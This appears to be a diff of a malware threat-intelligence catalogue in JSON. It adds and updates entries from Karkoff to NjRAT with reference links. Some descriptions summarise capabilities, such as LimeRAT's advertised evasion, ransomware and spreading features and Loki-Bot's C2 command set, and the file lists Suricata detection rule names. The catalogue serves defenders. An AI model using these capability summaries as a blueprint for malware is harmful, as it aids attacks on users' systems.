"8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", "value": "Karius" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a45c16d9-6945-428c-af46-0436903f9329", + "value": "Karkoff" + }, { "description": "", "meta": { @@ -8748,6 +10234,41 @@ "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", + "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", + "https://blog.cystack.net/word-based-malware-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18", + "value": "KerrDown" + }, + { + "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase", + "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/", + "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", + "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/", + "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017", + "https://voidsec.com/keybase-en/", + "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", + "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/" + ], + "synonyms": [ + "Kibex" + ], + "type": [] + }, + "uuid": "8a7bb20e-7e90-4330-8f53-744bd5519f6f", + "value": "KeyBase" + }, { "description": "", "meta": { @@ -8786,7 +10307,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", + "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], "type": [] @@ -8794,19 +10316,6 @@ "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keypass", - "https://securelist.com/keypass-ransomware/87412/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", - "value": "KeyPass" - }, { "description": "", "meta": { @@ -8872,6 +10381,7 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ @@ -8888,7 +10398,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.morphick.com/resources/news/klrd-keylogger" + "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html" ], "synonyms": [], "type": [] @@ -8923,6 +10433,22 @@ "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, + { + "description": "KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", + "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" + ], + "synonyms": [], + "type": [] + }, + "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06", + "value": "KOMPROGO" + }, { "description": "", "meta": { @@ -9019,10 +10545,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", + "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" + "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/" ], "synonyms": [ "BlackMoon" @@ -9050,13 +10577,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", + "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", - "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", @@ -9124,12 +10652,26 @@ "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", "value": "Kurton" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki", + "https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff40299b-dc45-4a1c-bfe2-3864682b8fea", + "value": "Kutaki" + }, { "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/" ], "synonyms": [], "type": [] @@ -9213,6 +10755,19 @@ "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", "value": "Laziok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "454db469-724a-4084-873c-906abf91d0d5", + "value": "LazyCat" + }, { "description": "", "meta": { @@ -9259,6 +10814,21 @@ "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, + { + "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", + "https://www.youtube.com/watch?v=x-g-ZLeX8GM", + "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", + "https://github.com/NYAN-x-CAT/Lime-RAT/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "771dbe6a-3f01-4bd4-8edd-070b2eb9df66", + "value": "LimeRAT" + }, { "description": "", "meta": { @@ -9298,6 +10868,25 @@ "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", + "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.abuse.io/lockergoga.txt", + "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", + "https://www.youtube.com/watch?v=o6eEN0mUakM", + "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", + "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4a6469d-6753-4195-9635-f11d458525f9", + "value": "LockerGoga" + }, { "description": "", "meta": { @@ -9358,7 +10947,7 @@ "value": "LockPOS" }, { - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", @@ -9400,22 +10989,36 @@ "value": "LogPOS" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", + "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba", + "value": "LoJax" + }, + { + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://isc.sans.edu/diary/24372", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" ], "synonyms": [ "Loki", @@ -9440,17 +11043,31 @@ "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "Lordix" }, + { + "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "484b9fd9-76c6-41af-a85b-189b0fc94909", + "value": "LOWBALL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark" + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] @@ -9458,6 +11075,20 @@ "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, + { + "description": " An uploader that can exfiltrate files to Dropbox.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://twitter.com/MrDanPerez/status/1097881406661902337" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b", + "value": "LunchMoney" + }, { "description": "", "meta": { @@ -9761,7 +11392,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", - "http://www.clearskysec.com/tulip/" + "http://www.clearskysec.com/tulip/", + "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" ], "synonyms": [], "type": [] @@ -9818,6 +11450,19 @@ "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", "value": "Mebromi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd055701-89ad-41be-b4d9-69460876fdee", + "value": "MECHANICAL" + }, { "description": "", "meta": { @@ -9847,6 +11492,21 @@ "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", "value": "Medusa" }, + { + "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin", + "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html", + "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html", + "https://github.com/Ne0nd0g/merlin" + ], + "synonyms": [], + "type": [] + }, + "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e", + "value": "Merlin" + }, { "description": "", "meta": { @@ -9963,6 +11623,7 @@ "https://github.com/gentilkiwi/mimikatz", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/", " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], @@ -10279,7 +11940,9 @@ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], - "synonyms": [], + "synonyms": [ + "MPK" + ], "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", @@ -10300,7 +11963,7 @@ "value": "Multigrain POS" }, { - "description": "", + "description": " a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", @@ -10365,11 +12028,14 @@ "value": "MyloBot" }, { - "description": "", + "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", - "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector", + "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", + "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/" ], "synonyms": [], "type": [] @@ -10422,6 +12088,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" ], @@ -10598,11 +12265,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", - "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://www.circl.lu/pub/tr-23/", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", - "https://www.circl.lu/pub/tr-23/" + "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" ], "synonyms": [ "Recam" @@ -10631,6 +12299,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", + "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", "http://securitykitten.github.io/an-evening-with-n3utrino/", @@ -10795,8 +12464,9 @@ "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - 